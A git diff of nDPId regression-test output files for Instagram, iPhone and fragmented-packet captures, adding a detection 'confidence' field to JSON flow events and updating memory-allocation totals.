+00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265146,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796265146,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1568796265146,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDQAbvb0IW1AAAAALAC\/\/8u4wAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265147,"flow_last_seen":1568796265147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1568796265147,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -225,17 +227,17 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
-00665{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00662{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
-00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","total-events-serialized":238}
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2230,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265146,"flow_last_seen":1568796265175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1568796265175,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2231,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796265147,"flow_last_seen":1568796265176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":526,"flow_tot_l4_payload_len":1152,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1568796265176,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":1366,"flow_first_seen":1568796253770,"flow_last_seen":1568796268061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1220206,"flow_avg_l4_payload_len":893,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":144,"flow_first_seen":1568796254514,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":97782,"flow_avg_l4_payload_len":679,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":388,"flow_first_seen":1568796254515,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":283610,"flow_avg_l4_payload_len":730,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":230,"flow_first_seen":1568796254524,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155234,"flow_avg_l4_payload_len":674,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":359,"flow_first_seen":1568796265146,"flow_last_seen":1568796268054,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":272019,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":212,"flow_first_seen":1568796265147,"flow_last_seen":1568796268053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":155200,"flow_avg_l4_payload_len":732,"midstream":0,"ts_msec":1568796268061,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
+00161{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3443,"source":"instagram.pcap","alias":"nDPId-test","total-events-serialized":240}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 3443/3442
 ~~ skipped flows.............: 0
@@ -244,9 +246,9 @@
 ~~ total active/idle flows...: 38/38
 ~~ total timeout flows.......: 9
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 5310659 bytes
-~~ total memory freed........: 5310659 bytes
-~~ total allocations/frees...: 103259/103259
+~~ total memory allocated....: 5380452 bytes
+~~ total memory freed........: 5380452 bytes
+~~ total allocations/frees...: 104849/104849
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 166 chars
 ~~ json string max len.......: 2410 chars
diff --git a/test/results/ip_fragmented_garbage.pcap.out b/test/results/ip_fragmented_garbage.pcap.out
index a1cf38277..2de19d1d9 100644
--- a/test/results/ip_fragmented_garbage.pcap.out
+++ b/test/results/ip_fragmented_garbage.pcap.out
@@ -18220,9 +18220,9 @@
 ~~ total active/idle flows...: 29/29
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4629270 bytes
-~~ total memory freed........: 4629270 bytes
-~~ total allocations/frees...: 99666/99666
+~~ total memory allocated....: 4705039 bytes
+~~ total memory freed........: 4705039 bytes
+~~ total allocations/frees...: 101256/101256
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 180 chars
 ~~ json string max len.......: 602 chars
diff --git a/test/results/iphone.pcap.out b/test/results/iphone.pcap.out
index 1043a2122..67f973f44 100644
--- a/test/results/iphone.pcap.out
+++ b/test/results/iphone.pcap.out
@@ -1,22 +1,22 @@
 00438{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"iphone.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01115{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454552576,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"ts_msec":1582454552576,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIaAFkAAEAR8inAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454552576,"flow_last_seen":1582454552576,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454552576,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454553219,"flow_last_seen":1582454553219,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454553219,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
